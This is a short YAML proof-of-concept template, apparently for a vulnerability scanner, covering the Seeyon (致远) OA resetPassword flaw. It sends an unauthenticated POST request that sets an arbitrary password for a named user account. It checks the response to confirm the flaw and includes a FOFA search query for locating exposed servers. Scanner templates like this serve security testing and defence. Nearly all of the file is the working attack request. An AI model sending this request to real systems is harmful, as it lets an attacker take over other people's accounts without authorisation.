id: seeyon-resetpassword-anyuser

info:
  name: 致远OA resetPassword任意用户密码修改漏洞
  author: zan8in
  severity: high
  description: |-
    致远OA resetPassword任意用户密码修改漏洞，注意：参数 loginName 需要真实存在的用户名
    FOFA: app="致远互联-OA"
  tags: seeyon,resetpassword
  created: 2023/09/12

rules:
  r0:
    request:
      method: POST
      path: /seeyon/rest/phoneLogin/phoneCode/resetPassword
      headers:
        Content-Type: application/json
      body: |
        {"loginName":"afrogtest","password":"admin@123456"}
    expression: |
      response.status == 500 && response.body.bcontains(b'"code" : 500') && response.body.bcontains(b'"success" : false') && response.body.bcontains(b'"message" : null')
expression: r0()
